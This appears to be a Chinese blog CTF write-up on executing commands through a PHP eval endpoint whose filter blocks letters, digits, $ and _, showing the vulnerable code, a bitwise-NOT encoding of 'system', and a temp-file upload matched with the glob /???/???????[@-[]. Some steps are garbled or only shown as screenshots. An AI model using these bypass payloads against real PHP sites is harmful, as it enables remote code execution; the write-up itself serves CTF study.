无字母数字webshell命令执行

复制代码
<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

限制:

1.webshell长度不超过35

2.正则过滤掉了数字字母还有$和_

php7环境:

取反

php中'~'表示取反,而取反之后大都是不可见字符

复制代码
<?php
var_dump(urlencode(~'system'));

取反后的值为%8C%86%8C%8B%9A%92

解码:

复制代码
<?php
var_dump(urlencode(~'phpinfo'));

答案如下:

php5环境:

通配符

用通配符来进行匹配,无法准确匹配

但我们要继续通配符

\^a\]表示这里不为a \[0-9\]表示0-9这个范围 而注意到linux中文件基本都是小写,我们上传的文件中后几位是随机的,可能包含大写,所以我们就只需要利用\[\]表示出大写字母就可以了 在ascii表中,大写字母处于@-\[之间,所以很明确了,使用/???/???????\[@-\[\]来进行匹配 执行: Document

写一个form表单上传文件到web.php,使用bp抓包,抓一个上传文件的包和web.php的包 ![](https://i-blog.csdnimg.cn/direct/aa866ef860624319a33769a58a1ec267.png) ![](https://i-blog.csdnimg.cn/direct/031663b524354a0d93e1ceb4c78a2554.png) 把第一个包的post内容放入web.php中 ![](https://i-blog.csdnimg.cn/direct/8072b8ca7ac749a8a33681d10d2c99f7.png) 发送请求 ![](https://i-blog.csdnimg.cn/direct/0a8fab9500094965b90eb324f27a9ac4.png) 结束

相关推荐
hrrrrb40 分钟前
【Spring Security】Spring Security 概念
java·数据库·spring
小信丶40 分钟前
Spring 中解决 “Could not autowire. There is more than one bean of type“ 错误
java·spring
sdgsdgdsgc42 分钟前
Next.js企业级应用开发:SSR、ISR与性能监控方案
开发语言·前端·javascript
哲此一生98443 分钟前
搭建Vue3工程(去除不必要的文件)
前端·javascript·vue.js
周杰伦_Jay2 小时前
【Java虚拟机(JVM)全面解析】从原理到面试实战、JVM故障处理、类加载、内存区域、垃圾回收
java·jvm
黑云压城After4 小时前
H5使用环信实现视频或语音通话
前端·javascript·vue.js
未来之窗软件服务5 小时前
自己写算法(九)网页数字动画函数——东方仙盟化神期
前端·javascript·算法·仙盟创梦ide·东方仙盟·东方仙盟算法
程序员小凯5 小时前
Spring Boot测试框架详解
java·spring boot·后端
路由侠内网穿透5 小时前
本地部署开源持续集成和持续部署系统 Woodpecker CI 并实现外部访问
服务器·网络·windows·ci/cd·开源
程序猿小三5 小时前
Linux下基于关键词文件搜索
linux·运维·服务器